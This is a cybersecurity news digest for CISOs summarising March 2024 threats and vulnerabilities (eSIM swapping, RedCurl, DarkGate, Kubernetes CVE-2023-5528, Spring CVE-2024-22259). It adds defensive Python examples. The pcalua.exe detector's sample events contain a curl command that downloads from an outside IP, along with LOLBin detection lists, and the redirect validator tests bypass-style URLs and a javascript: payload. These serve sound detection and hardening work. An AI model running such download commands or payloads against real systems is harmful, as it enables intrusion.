CISO Daily Update - March 15, 2024

NEW DEVELOPMENTS

SIM Swappers Now Stealing Phone Numbers From eSIMs

Source: Bleeping Computer

SIM swappers have adapted their tactics to target phone numbers stored on eSIMs, abusing the remote provisioning that lets these embedded cards be reprogrammed in modern smartphones. Russian cybersecurity firm F.A.C.C.T. reports a surge in attacks in which criminals hijack eSIMs to reach bank accounts and other online services. After compromising the victim's account with the mobile carrier, the attacker transfers the number to an eSIM on their own device and from then on receives the victim's SMS one-time codes and other two-factor prompts. Because intercepting those codes is the whole point of the attack, SMS should not be the only second factor on high-value accounts. To mitigate the threat, experts advise strong, unique passwords on the carrier account, two-factor authentication wherever it is offered, and additional protection for sensitive accounts such as e-banking and cryptocurrency wallets.

Article Link


Meta Sues Former VP After Defection to AI Startup

Source: Infosecurity Magazine

Meta has sued its former Vice President of Infrastructure, Dipinder Singh (TS) Khurana, accusing him of taking employee and business contracts before resigning to join an AI startup. The suit, filed in California state court on February 29, alleges that Khurana breached his contract by taking proprietary and confidential documents about Meta's business and personnel, uploading them to his personal Google Drive and Dropbox accounts before leaving for Omniva, a stealth AI startup he joined in June 2023 along with several former Meta employees. The alleged pattern is a familiar insider one: a departing executive with broad access and consumer cloud storage as the exfiltration channel. A recent Code42 report found that 85% of cybersecurity leaders expect data loss from insider events to increase over the next year.

Article Link


RedLine Malware Top Credential Stealer of Last 6 Months

Source: SC Magazine

RedLine has been the dominant credential stealer of the past six months, linked to more than 170 million stolen passwords. That is 47% of all stolen credentials in the dataset, well ahead of its closest competitor, Vidar, with more than 65 million (17%), and Raccoon Stealer in third place with more than 42 million (11.7%). The figures were compiled from breached-password lists by KrakenLabs and Specops and underline how pervasive credential-stealing malware has become: a password or browser session lifted from an employee's endpoint is valid regardless of how strong the password policy was.

Article Link


DarkGate Malware Exploited Recently Patched Microsoft Flaw in Zero-Day Attack

Source: The Hacker News

A DarkGate malware campaign exploited a Microsoft Windows security flaw, CVE-2024-21412, before it was patched, using PDF lures that pointed to open redirects and ultimately to fake software installers. The same flaw had separately been used by the threat actor Water Hydra (also known as DarkCasino) in attacks on financial traders. The attack chain combined phishing emails with embedded links, open redirects, and bogus installers, a reminder that the patch is only part of the defense and that users should stay cautious with unsolicited attachments and downloads.

Article Link


Tech Support Firms Restoro, Reimage Fined $26 Million for Scare Tactics

Source: Bleeping Computer

Restoro and Reimage, two tech support firms, will pay $26 million under a proposed FTC order for using scare tactics to push customers into buying unnecessary computer repair services. The U.S. Federal Trade Commission charged the Cyprus-based companies with deceptive marketing that preyed on consumers, particularly older people: fake system warnings, misrepresented scan results, and pressure to pay for repair plans. The proposed order bars Restoro and Reimage from deceptive telemarketing and from misrepresenting security or performance problems to manipulate consumers.

Article Link


RedCurl Cybercrime Group Abuses Windows PCA Tool for Corporate Espionage

Source: The Hacker News

The Russian-speaking cybercrime group RedCurl has been observed abusing the Program Compatibility Assistant (PCA), a legitimate Windows component, to run its commands. RedCurl, also tracked as Earth Kapre and Red Wolf, has been active since at least 2018 and conducts corporate espionage against organizations in several countries. Its tradecraft chains PowerShell, curl, and the PCA command-line launcher (pcalua.exe) so that malicious commands run as children of a signed Microsoft binary rather than of the script that started them, which helps the activity blend in and evade detection inside targeted networks.
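The defensive counterpart to this technique is a process-creation rule that scores pcalua.exe launches by their context. The example below is added here and is not code from the article or from any vendor report; it scores Sysmon-style process events (the JSON lines are constructed sample data, not real telemetry) and flags `pcalua.exe -a <target>` when the parent is a script host or downloader, the target lives in a user-writable directory, or the target is itself an interpreter. The `-a` switch is the documented launcher syntax; the field names, parent list and threshold are this example's assumptions.

```python
"""Score pcalua.exe launches from process-creation events (added example).

pcalua.exe -a <program> runs <program> on the caller's behalf, so a payload
appears as the child of a signed Microsoft binary. A benign launch (Explorer
starting a legacy installer) scores low; a script host starting something in
%TEMP% or another interpreter through pcalua.exe scores high.
"""
import json
import re

# Constructed sample events, one JSON object per line (Sysmon Event ID 1 style).
SAMPLE_EVENTS = r'''
{"ts":"2024-03-14T09:12:01Z","host":"WS01","Image":"C:\\Windows\\System32\\pcalua.exe","CommandLine":"pcalua.exe -a \"C:\\Program Files\\LegacyApp\\setup.exe\"","ParentImage":"C:\\Windows\\explorer.exe"}
{"ts":"2024-03-14T09:15:44Z","host":"WS01","Image":"C:\\Windows\\System32\\pcalua.exe","CommandLine":"pcalua.exe -a C:\\Users\\jdoe\\AppData\\Local\\Temp\\svc.exe","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"}
{"ts":"2024-03-14T09:16:02Z","host":"WS02","Image":"C:\\Windows\\System32\\pcalua.exe","CommandLine":"PCALUA.EXE -a cmd.exe /c curl.exe -o C:\\ProgramData\\u.dat http://198.51.100.7/u","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"ts":"2024-03-14T09:20:10Z","host":"WS03","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c dir","ParentImage":"C:\\Windows\\explorer.exe"}
'''

# Assumed lists; extend them to match the script hosts and LOLBins you care about.
SCRIPT_PARENTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                  "cscript.exe", "mshta.exe", "curl.exe"}
INTERPRETER_TARGETS = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe",
                       "regsvr32.exe", "mshta.exe", "curl.exe", "wscript.exe", "cscript.exe"}
USER_WRITABLE = re.compile(r"(?i)\\(?:AppData|Temp|ProgramData|Public|Downloads)\\")
# "-a" followed by either a quoted path or a single bare token.
_A_FLAG = re.compile(r'(?i)(?:^|\s)-a\s+(?:"([^"]+)"|(\S+))')


def parse_events(text):
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def basename(path):
    """Lower-cased final path component, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def pcalua_target(cmdline):
    """Return the program handed to pcalua.exe via -a, or None if there is none."""
    m = _A_FLAG.search(cmdline)
    if not m:
        return None
    return m.group(1) or m.group(2)


def score_event(ev):
    """Return (score, reasons) for one event; (0, []) if it is not a pcalua -a launch."""
    if basename(ev.get("Image", "")) != "pcalua.exe":
        return 0, []
    cmdline = ev.get("CommandLine", "")
    target = pcalua_target(cmdline)
    if target is None:
        return 0, []
    score, reasons = 1, ["pcalua.exe -a launches another program on the caller's behalf"]
    parent = basename(ev.get("ParentImage", ""))
    if parent in SCRIPT_PARENTS:
        score += 2
        reasons.append(f"parent is a script host or downloader ({parent})")
    if USER_WRITABLE.search(target):
        score += 2
        reasons.append("target lives in a user-writable directory")
    if basename(target) in INTERPRETER_TARGETS:
        score += 2
        reasons.append(f"target is itself an interpreter or LOLBin ({basename(target)})")
    if "http://" in cmdline.lower() or "https://" in cmdline.lower():
        score += 1
        reasons.append("command line contains a URL")
    return score, reasons


def detect(text, threshold=3):
    """Return the events whose score reaches the threshold, with the reasons."""
    findings = []
    for ev in parse_events(text):
        score, reasons = score_event(ev)
        if score >= threshold:
            findings.append({"ts": ev["ts"], "host": ev["host"], "score": score,
                             "command": ev["CommandLine"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['ts']} {f['host']} score={f['score']}: {f['command']}")
        for r in f["reasons"]:
            print("   -", r)
```

On the sample data the Explorer-launched installer scores 1 and is not reported, while the PowerShell-launched binary in %TEMP% (score 5) and the cmd.exe-to-cmd.exe-with-curl chain (score 6) are. Tune the threshold against a week of your own telemetry before alerting on it.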

Article Link


Ande Loader Malware Targets Manufacturing Sector in North America

Source: The Hacker News

The threat actor Blind Eagle, also tracked as APT-C-36, has stepped up its operations, using the Ande Loader malware to deploy remote access trojans (RATs) against Spanish-speaking users in the manufacturing sector in North America. The lure is a phishing email carrying a password-protected RAR or BZ2 archive that hides a malicious VBScript file; once run, the script establishes persistence and launches Ande Loader, which downloads and executes the RAT payload. The payload depends on the delivery vector: Remcos RAT arrives via the RAR archives, while NjRAT is distributed through BZ2 archives served from Discord content delivery network (CDN) links. Blind Eagle wraps the malware in additional layers of encryption and obfuscation. Password-protected archives defeat inline attachment scanning by design, so mail policies that quarantine encrypted archives from external senders, combined with endpoint visibility into script hosts such as wscript.exe running files from user-writable folders, cover much of this chain.

Article Link


VULNERABILITIES TO WATCH

Patch Now: Kubernetes RCE Flaw Allows Full Takeover of Windows Nodes

Source: Darkreading

A high-severity vulnerability in Kubernetes, CVE-2023-5528, lets an attacker who can create pods and persistent volumes run arbitrary code on Windows nodes with SYSTEM privileges. The flaw is a command injection through a crafted volume definition on clusters that use an in-tree storage plugin for Windows nodes: by manipulating the volume, an attacker escalates from in-cluster access to full administrative control of every Windows node in the cluster. Default installations are affected. The fix ships in Kubernetes 1.28.4, 1.27.8, 1.26.11 and 1.25.16; older minor releases have no patched version and must be upgraded. The finding is a reminder to keep RBAC tight on who may create pods and persistent volumes, and to audit volume configurations for unexpected values.
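The first question for a cluster owner is which Windows nodes are running a kubelet older than the fixed release for their minor version. The example below is added here and is not from the article or the Kubernetes project; it reads the JSON that `kubectl get nodes -o json` produces and classifies each Windows node against the fixed versions named above. The node list embedded in it is constructed sample data, and treating everything below 1.25 as vulnerable is this example's own policy, since no patched release exists for those minors.

```python
"""Triage Windows nodes for CVE-2023-5528 from `kubectl get nodes -o json` (added example).

Fixed kubelet releases: v1.28.4, v1.27.8, v1.26.11, v1.25.16. Minor versions 1.29 and
later were cut after the fix. Minors older than 1.25 were out of support when the fix
shipped, so this script reports them as vulnerable with no patch available.
"""
import json
import re

FIXED_PATCH = {(1, 28): 4, (1, 27): 8, (1, 26): 11, (1, 25): 16}
_VER = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)")  # tolerates suffixes like -eks-abc or -gke.100

# Constructed sample node list, not output from a real cluster.
SAMPLE_NODES = json.dumps({"items": [
    {"metadata": {"name": "win-node-1", "labels": {"kubernetes.io/os": "windows"}},
     "status": {"nodeInfo": {"kubeletVersion": "v1.28.3", "operatingSystem": "windows"}}},
    {"metadata": {"name": "win-node-2", "labels": {"kubernetes.io/os": "windows"}},
     "status": {"nodeInfo": {"kubeletVersion": "v1.27.8", "operatingSystem": "windows"}}},
    {"metadata": {"name": "win-node-3", "labels": {"kubernetes.io/os": "windows"}},
     "status": {"nodeInfo": {"kubeletVersion": "v1.24.17", "operatingSystem": "windows"}}},
    {"metadata": {"name": "linux-node-1", "labels": {"kubernetes.io/os": "linux"}},
     "status": {"nodeInfo": {"kubeletVersion": "v1.28.3", "operatingSystem": "linux"}}},
]})


def parse_version(s):
    """Return (major, minor, patch) from a kubelet version string such as 'v1.28.3-eks-1'."""
    m = _VER.match(s)
    if not m:
        raise ValueError(f"unrecognised kubelet version: {s!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable(kubelet_version):
    """True if this kubelet predates the fixed release for its minor (or has no fix)."""
    major, minor, patch = parse_version(kubelet_version)
    if (major, minor) > (1, 28):
        return False                       # 1.29+ was released with the fix
    fixed = FIXED_PATCH.get((major, minor))
    if fixed is None:
        return True                        # 1.24 and older: no patched release exists
    return patch < fixed


def is_windows(node):
    """Prefer the kubernetes.io/os label; fall back to nodeInfo.operatingSystem."""
    labels = node.get("metadata", {}).get("labels", {})
    os_label = labels.get("kubernetes.io/os") or labels.get("beta.kubernetes.io/os")
    if os_label:
        return os_label.lower() == "windows"
    os_info = node.get("status", {}).get("nodeInfo", {}).get("operatingSystem", "")
    return os_info.lower() == "windows"


def triage(nodes_json):
    """Return one record per Windows node with its kubelet version and verdict."""
    doc = json.loads(nodes_json)
    report = []
    for node in doc.get("items", []):
        if not is_windows(node):
            continue                       # the flaw is specific to Windows nodes
        version = node["status"]["nodeInfo"]["kubeletVersion"]
        report.append({"node": node["metadata"]["name"],
                       "kubelet": version,
                       "vulnerable": is_vulnerable(version)})
    return report


if __name__ == "__main__":
    for row in triage(SAMPLE_NODES):
        state = "VULNERABLE" if row["vulnerable"] else "patched"
        print(f"{row['node']:14} {row['kubelet']:12} {state}")
```

Feed it real data with `kubectl get nodes -o json | python3 triage.py` after swapping `SAMPLE_NODES` for `sys.stdin.read()`. Version triage covers only half of the advisory; the other half is RBAC, and `kubectl auth can-i create persistentvolumes --as=<user>` is the quickest way to see which identities could reach the vulnerable code path at all.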

Article Link


Cisco Fixed High-Severity Elevation of Privilege and DoS Bugs

Source: Security Affairs

Cisco released patches for several high-severity vulnerabilities in IOS XR software, including privilege-escalation and denial-of-service (DoS) flaws. CVE-2024-20320 allows an authenticated, local attacker to escalate privileges on an affected device through the SSH client feature. CVE-2024-20318 allows an unauthenticated, adjacent attacker to reset line-card network processors, causing a DoS for Layer 2 Ethernet services. CVE-2024-20327 affects ASR 9000 Series routers performing PPP over Ethernet (PPPoE) termination and lets an unauthenticated, adjacent attacker crash the ppp_ma process, causing a DoS for PPPoE traffic. Cisco is not aware of in-the-wild exploitation, but the updates should be applied as soon as possible.

Article Link


Critical Vulnerabilities in Arcserve UDP Software Demand Urgent Action

Source: SecurityOnline.info

Tenable researchers disclosed a chain of three vulnerabilities in Arcserve Unified Data Protection (UDP), a widely used backup and disaster-recovery product: CVE-2024-0799 (authentication bypass), CVE-2024-0800 (path traversal allowing arbitrary file upload) and CVE-2024-0801 (denial of service). Together they let an attacker bypass login, upload malicious files and disrupt backup operations on versions 9.2 and 8.1. Backup servers hold copies of everything an intruder would want to steal or destroy before deploying ransomware, so these should be patched immediately and the management interface kept off untrusted networks.

Article Link


CVE-2024-22259: Spring Framework Update Fixes High-Severity Flaw

Source: SecurityOnline.info

A high-severity vulnerability, CVE-2024-22259, has been disclosed in the Spring Framework, a core component of many Java applications. It affects applications that use UriComponentsBuilder to parse externally supplied URLs and then validate the host: for crafted inputs the host reported by the parser can differ from the host a browser or HTTP client will actually connect to, so a host check passes and the application goes on to perform an open redirect or a server-side request forgery (SSRF), enabling phishing or access to internal resources. It is a follow-up to CVE-2024-22243 in the same component with different input, so applications that patched the earlier issue need to upgrade again. Upgrade to Spring Framework 6.1.5, 6.0.18 or 5.3.33.
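The mistake this CVE punishes is validating a URL with one parser and then handing the raw string to the client or to an HTTP library, so any disagreement about the host becomes a redirect or a request to the wrong place. The added example below is written in Python rather than as Spring code and is not from the article or the Spring project; it shows a redirect-target validator that never echoes the raw input: it parses, rejects userinfo, protocol-relative, non-https and odd-port inputs, checks the host against an allowlist, and rebuilds the target from the validated components. The same function serves as an SSRF guard for user-supplied fetch URLs. The allowlisted host names are assumptions.

```python
"""Rebuild a redirect or fetch target from validated URL components (added example).

The raw user string is never returned. Whatever a downstream parser or browser
would have made of it, the only thing emitted is scheme + allowlisted host +
path + query that this code assembled itself.
"""
from urllib.parse import urlsplit, urlunsplit

ALLOWED_HOSTS = {"example.com", "www.example.com"}   # assumed allowlist
MAX_LEN = 2048


def safe_target(user_supplied, default="/"):
    """Return a safe redirect target built from validated parts, or `default`."""
    if not isinstance(user_supplied, str) or len(user_supplied) > MAX_LEN:
        return default
    # Control characters and backslashes are where browsers and parsers disagree most.
    if any(ord(c) < 0x20 or c == "\\" for c in user_supplied):
        return default
    try:
        parts = urlsplit(user_supplied)
        # Relative target: exactly one leading "/" (not "//host"), path and query only.
        if not parts.scheme and not parts.netloc:
            path = parts.path
            if not path.startswith("/") or path.startswith("//"):
                return default
            return urlunsplit(("", "", path, parts.query, ""))
        # Absolute target: https only, no userinfo, allowlisted host, default port.
        if parts.scheme.lower() != "https":
            return default                      # also rejects "//evil" and javascript:
        if parts.username is not None or parts.password is not None:
            return default                      # "https://example.com@evil.com" style
        host = parts.hostname
        if not host or host.lower() not in ALLOWED_HOSTS:
            return default
        if parts.port not in (None, 443):       # .port raises ValueError on junk ports
            return default
        path = parts.path or "/"
        return urlunsplit(("https", host.lower(), path, parts.query, ""))
    except ValueError:
        return default


if __name__ == "__main__":
    for candidate in ("/account?next=1",
                      "https://EXAMPLE.com/account?x=1",
                      "https://example.com@evil.com/",
                      "//evil.com/",
                      "https://example.com#@evil.com",
                      "javascript:alert(1)"):
        print(f"{candidate!r:40} -> {safe_target(candidate)!r}")
```

Dropping the fragment and rebuilding the string is deliberate: it means a parser bug in whatever library sits downstream cannot resurrect a host that this function never approved. Upgrading Spring remains the actual fix; this pattern is defense in depth for the next parser discrepancy.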

Article Link


SPECIAL REPORTS

Shadow AI – Should I be Worried?

Source: Security Week

The spread of AI tools, especially generative AI such as ChatGPT, raises security and privacy concerns for organizations. With roughly 12,000 AI tools on offer for almost every job task, employers struggle to control their use. Employee adoption keeps growing, yet many organizations have no clear policy or safeguards for AI risk, which opens the door to data leakage and compliance problems; most of these tools also lack robust privacy and data-retention policies, so whatever an employee pastes into a prompt may be retained and reused in ways the organization never agreed to. Further concerns include prompt injection attacks, account takeover of AI service accounts, and misuse of sensitive corporate data. Blanket bans tend to backfire by pushing users toward alternative, unvetted tools, which makes the exposure worse. A better approach is to educate users on responsible AI use and write pragmatic policies that balance the security concerns against the productivity gains these tools offer.

Article Link


CISA Launches 911 Cybersecurity Hub: Empowering Emergency Responders

Source: The Cyber Express

The Cybersecurity and Infrastructure Security Agency (CISA), together with SAFECOM and the National Council of Statewide Interoperability Coordinators (NCSWIC), has launched the 911 Cybersecurity Resource Hub for Emergency Communications Centers (ECCs) nationwide. The hub gives ECCs a single point of access to cybersecurity resources and expertise, and CISA says it will keep working with state and local stakeholders so the hub stays responsive as the threats facing ECCs change. It complements existing CISA programs such as the Regional Resiliency Assessment Program (RRAP) and the Joint Cyber Defense Collaborative (JCDC), which aim to strengthen critical-infrastructure resilience and counter cyber threats.

Article Link


New Report Suggests Surge in SaaS Assets, Employee Data Sharing

Source: Infosecurity Magazine

Recent DoControl research points to a sharp rise in software-as-a-service (SaaS) assets, with an average of 286,000 new assets created each week in 2023, up 189% from the previous year. The report also quantifies insider risk: one in six employees shares company material through a personal email account. Stale access permissions and over-permissioned third-party OAuth apps add to the exposure. The research concludes that businesses need centralized, automated data-access controls across their SaaS estate.

Article Link

Brian Neuhaus

Cybersecurity Leader & CISO driving innovation at Neuhaus Ventures | Servant leader to making this planet a safer place

11 months

Nice wrap-up


More articles by Marcos Christodonte II

  • Rethinking Enterprise Cybersecurity Strategies in an Era of Change
  • CISO Daily Update - December 19, 2024
  • CISO Daily Update - December 18, 2024
  • CISO Daily Update - December 16, 2024
  • CISO Daily Update - December 13, 2024
  • CISO Daily Update - December 12, 2024
  • CISO Daily Update - December 11, 2024
  • CISO Daily Update - December 10, 2024
  • CISO Daily Update - December 9, 2024
  • CISO Daily Update - December 6, 2024
